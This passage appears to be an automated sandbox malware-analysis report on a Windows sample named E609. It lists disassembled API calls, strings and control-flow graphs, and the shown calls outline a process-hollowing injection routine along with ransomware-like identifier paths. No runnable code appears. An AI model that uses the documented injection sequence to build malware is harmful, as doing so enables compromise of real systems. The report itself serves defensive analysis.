                                                                                                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                • API String ID: 441990211-897913220
                                                                                                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .\crypto\err\err.c$unknown
                                                                                                • API String ID: 0-565200744
                                                                                                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                • String ID: 8Q
                                                                                                • API String ID: 3761405300-2096853525
                                                                                                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                APIs
                                                                                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                • _memset.LIBCMT ref: 00413C83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1327501947-3788999226
                                                                                                • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fputws$CreateDirectory
                                                                                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                • API String ID: 2590308727-54166481
                                                                                                • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                APIs
                                                                                                Strings
                                                                                                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __calloc_crt
                                                                                                • String ID: Assertion failed: %s, file %s, line %d
                                                                                                • API String ID: 3494438863-969893948
                                                                                                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00480686
                                                                                                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                Strings
                                                                                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset_raise
                                                                                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                • API String ID: 1484197835-3867593797
                                                                                                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                • String ID: TeM
                                                                                                • API String ID: 757275642-2215902641
                                                                                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:97.4%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:39
                                                                                                Total number of Limit Nodes:7
                                                                                                execution_graph 30852 4a70000 30855 4a70630 30852->30855 30854 4a70005 30856 4a7064c 30855->30856 30858 4a71577 30856->30858 30861 4a705b0 30858->30861 30864 4a705dc 30861->30864 30862 4a705e2 GetFileAttributesA 30862->30864 30863 4a7061e 30864->30862 30864->30863 30866 4a70420 30864->30866 30867 4a704f3 30866->30867 30868 4a704ff CreateWindowExA 30867->30868 30869 4a704fa 30867->30869 30868->30869 30870 4a70540 PostMessageA 30868->30870 30869->30864 30871 4a7055f 30870->30871 30871->30869 30873 4a70110 VirtualAlloc GetModuleFileNameA 30871->30873 30874 4a70414 30873->30874 30875 4a7017d CreateProcessA 30873->30875 30874->30871 30875->30874 30877 4a7025f VirtualFree VirtualAlloc Wow64GetThreadContext 30875->30877 30877->30874 30878 4a702a9 ReadProcessMemory 30877->30878 30879 4a702e5 VirtualAllocEx NtWriteVirtualMemory 30878->30879 30880 4a702d5 NtUnmapViewOfSection 30878->30880 30881 4a7033b 30879->30881 30880->30879 30882 4a70350 NtWriteVirtualMemory 30881->30882 30883 4a7039d WriteProcessMemory Wow64SetThreadContext ResumeThread 30881->30883 30882->30881 30884 4a703fb ExitProcess 30883->30884 30886 49dc000 30889 49dc026 30886->30889 30890 49dc035 30889->30890 30893 49dc7c6 30890->30893 30895 49dc7e1 30893->30895 30894 49dc7ea CreateToolhelp32Snapshot 30894->30895 30896 49dc806 Module32First 30894->30896 30895->30894 30895->30896 30897 49dc815 30896->30897 30899 49dc025 30896->30899 30900 49dc485 30897->30900 30901 49dc4b0 30900->30901 30902 49dc4f9 30901->30902 30903 49dc4c1 VirtualAlloc 30901->30903 30902->30902 30903->30902

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04A70156
                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 04A7016C
                                                                                                • CreateProcessA.KERNELBASE(?,00000000), ref: 04A70255
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04A70270
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04A70283
                                                                                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 04A7029F
                                                                                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A702C8
                                                                                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 04A702E3
                                                                                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04A70304
                                                                                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 04A7032A
                                                                                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04A70399
                                                                                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A703BF
                                                                                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 04A703E1
                                                                                                • ResumeThread.KERNELBASE(00000000), ref: 04A703ED
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 04A70412
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                • String ID:
                                                                                                • API String ID: 93872480-0
                                                                                                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                • Instruction ID: bf6f061cb1ebf8da9060c8a47effb6cbd3db80cd6f67adc560ac3dbbccc3ac12
                                                                                                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                • Instruction Fuzzy Hash: 00B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 15 4a70420-4a704f8 17 4a704ff-4a7053c CreateWindowExA 15->17 18 4a704fa 15->18 20 4a70540-4a70558 PostMessageA 17->20 21 4a7053e 17->21 19 4a705aa-4a705ad 18->19 22 4a7055f-4a70563 20->22 21->19 22->19 23 4a70565-4a70579 22->23 23->19 25 4a7057b-4a70582 23->25 26 4a70584-4a70588 25->26 27 4a705a8 25->27 26->27 28 4a7058a-4a70591 26->28 27->22 28->27 29 4a70593-4a70597 call 4a70110 28->29 31 4a7059c-4a705a5 29->31 31->27
                                                                                                APIs
                                                                                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04A70533
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateWindow
                                                                                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                • API String ID: 716092398-2341455598
                                                                                                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                • Instruction ID: 09c48fc7d90949afaf1c54c641d67a7f4f3368e78fc0e8ad3cb4a64cc1109d19
                                                                                                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                • Instruction Fuzzy Hash: F8512B70D08388DEEB11CBE8C849BDEBFB26F15708F144058D5447F286C3BA6658CBA6

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 32 4a705b0-4a705d5 33 4a705dc-4a705e0 32->33 34 4a705e2-4a705f5 GetFileAttributesA 33->34 35 4a7061e-4a70621 33->35 36 4a705f7-4a705fe 34->36 37 4a70613-4a7061c 34->37 36->37 38 4a70600-4a7060b call 4a70420 36->38 37->33 40 4a70610 38->40 40->37
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 04A705EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID: apfHQ$o
                                                                                                • API String ID: 3188754299-2999369273
                                                                                                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                • Instruction ID: 1cba4aba3901f09423234bcefab7ab508c09818f8ee73bd65666ae7d776a33a8
                                                                                                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                • Instruction Fuzzy Hash: 47011E70C0824CEEDB10DB98C9583AEBFB5AF51308F148099C4092B242D7B69B58CBA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 41 49dc7c6-49dc7df 42 49dc7e1-49dc7e3 41->42 43 49dc7ea-49dc7f6 CreateToolhelp32Snapshot 42->43 44 49dc7e5 42->44 45 49dc7f8-49dc7fe 43->45 46 49dc806-49dc813 Module32First 43->46 44->43 45->46 53 49dc800-49dc804 45->53 47 49dc81c-49dc824 46->47 48 49dc815-49dc816 call 49dc485 46->48 51 49dc81b 48->51 51->47 53->42 53->46
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 049DC7EE
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 049DC80E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 049DC000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_49dc000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 938fe22553eef8e46dd21322700387e8ed87b8c8727ac32e04b2729b49f15424
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: F2F06D326007116BE7203BF9A88DE6A76ECAF89765F108638E643D10C0DB70F8458A61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 54 49dc485-49dc4bf call 49dc798 57 49dc50d 54->57 58 49dc4c1-49dc4f4 VirtualAlloc call 49dc512 54->58 57->57 60 49dc4f9-49dc50b 58->60 60->57
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 049DC4D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 049DC000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_49dc000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: 870f8ffe0f78ac1a0a4ad46dc0af8c7c3c909e4641186c28f100c3ec7ba386b5
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 81113C79A00208EFDB01DF98C985E99BBF5AF08350F05C0A4F9489B361D771EA90EF80

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 553 4a96437-4a96440 554 4a96442-4a96446 553->554 555 4a96466 553->555 554->555 556 4a96448-4a96459 call 4a99636 554->556 557 4a96468-4a9646b 555->557 560 4a9645b-4a96460 call 4a95ba8 556->560 561 4a9646c-4a9647d call 4a99636 556->561 560->555 566 4a96488-4a9649a call 4a99636 561->566 567 4a9647f-4a96480 call 4a9158d 561->567 572 4a964ac-4a964cd call 4a95f4c call 4a96837 566->572 573 4a9649c-4a964aa call 4a9158d * 2 566->573 571 4a96485-4a96486 567->571 571->560 582 4a964cf-4a964dd call 4a9557d 572->582 583 4a964e2-4a96500 call 4a9158d call 4a94edc call 4a94d82 call 4a9158d 572->583 573->571 588 4a964df 582->588 589 4a96502-4a96505 582->589 592 4a96507-4a96509 583->592 588->583 589->592 592->557
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 1442030790-0
                                                                                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction ID: 483359d922d97db34e46345095c7680d6ac03fdc5df9afb7a07881ba9735a53d
                                                                                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction Fuzzy Hash: 4121AE36604601ABFF227FA5DB02E4B7BE8DF85768F508029E485591A0EA22BD50DA51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 597 4a93f16-4a93f2f 598 4a93f49-4a93f5e call 4a9bdc0 597->598 599 4a93f31-4a93f3b call 4a95ba8 call 4a94c72 597->599 598->599 604 4a93f60-4a93f63 598->604 606 4a93f40 599->606 607 4a93f65 604->607 608 4a93f77-4a93f7d 604->608 609 4a93f42-4a93f48 606->609 610 4a93f6b-4a93f75 call 4a95ba8 607->610 611 4a93f67-4a93f69 607->611 612 4a93f89-4a93f9a call 4aa0504 call 4aa01a3 608->612 613 4a93f7f 608->613 610->606 611->608 611->610 621 4a93fa0-4a93fac call 4aa01cd 612->621 622 4a94185-4a9418f call 4a94c9d 612->622 613->610 615 4a93f81-4a93f87 613->615 615->610 615->612 621->622 627 4a93fb2-4a93fbe call 4aa01f7 621->627 627->622 630 4a93fc4-4a93fcb 627->630 631 4a9403b-4a94046 call 4aa02d9 630->631 632 4a93fcd 630->632 631->609 638 4a9404c-4a9404f 631->638 634 4a93fcf-4a93fd5 632->634 635 4a93fd7-4a93ff3 call 4aa02d9 632->635 634->631 634->635 635->609 642 4a93ff9-4a93ffc 635->642 640 4a9407e-4a9408b 638->640 641 4a94051-4a9405a call 4aa0554 638->641 643 4a9408d-4a9409c call 4aa0f40 640->643 641->640 652 4a9405c-4a9407c 641->652 644 4a9413e-4a94140 642->644 645 4a94002-4a9400b call 4aa0554 642->645 653 4a940a9-4a940d0 call 4aa0e90 call 4aa0f40 643->653 654 4a9409e-4a940a6 643->654 644->609 645->644 655 4a94011-4a94029 call 4aa02d9 645->655 652->643 663 4a940de-4a94105 call 4aa0e90 call 4aa0f40 653->663 664 4a940d2-4a940db 653->664 654->653 655->609 660 4a9402f-4a94036 655->660 660->644 669 4a94113-4a94122 call 4aa0e90 663->669 670 4a94107-4a94110 663->670 664->663 673 4a9414f-4a94168 669->673 674 4a94124 669->674 670->669 677 4a9413b 673->677 678 4a9416a-4a94183 673->678 675 4a9412a-4a94138 674->675 676 4a94126-4a94128 674->676 675->677 676->675 679 4a94145-4a94147 676->679 677->644 678->644 679->644 680 4a94149 679->680 680->673 681 4a9414b-4a9414d 680->681 681->644 681->673
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 04A93F51
                                                                                                  • Part of subcall function 04A95BA8: __getptd_noexit.LIBCMT ref: 04A95BA8
                                                                                                • __gmtime64_s.LIBCMT ref: 04A93FEA
                                                                                                • __gmtime64_s.LIBCMT ref: 04A94020
                                                                                                • __gmtime64_s.LIBCMT ref: 04A9403D
                                                                                                • __allrem.LIBCMT ref: 04A94093
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A940AF
                                                                                                • __allrem.LIBCMT ref: 04A940C6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A940E4
                                                                                                • __allrem.LIBCMT ref: 04A940FB
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A94119
                                                                                                • __invoke_watson.LIBCMT ref: 04A9418A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                • String ID:
                                                                                                • API String ID: 384356119-0
                                                                                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction ID: accb30e3cb9e20145b50b900ef12684cb5b31a9e4cac4d113bded697e977d729
                                                                                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction Fuzzy Hash: 4A71E471A05716BBEF149F69CD40B6AB3F8AF18368F14822AE914DB2C0E770FD118790

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                • String ID:
                                                                                                • API String ID: 3432600739-0
                                                                                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction ID: 6b63f4db43f464435dbeca844c1246b79dc4ed9d799355f8a05bbfc129527bac
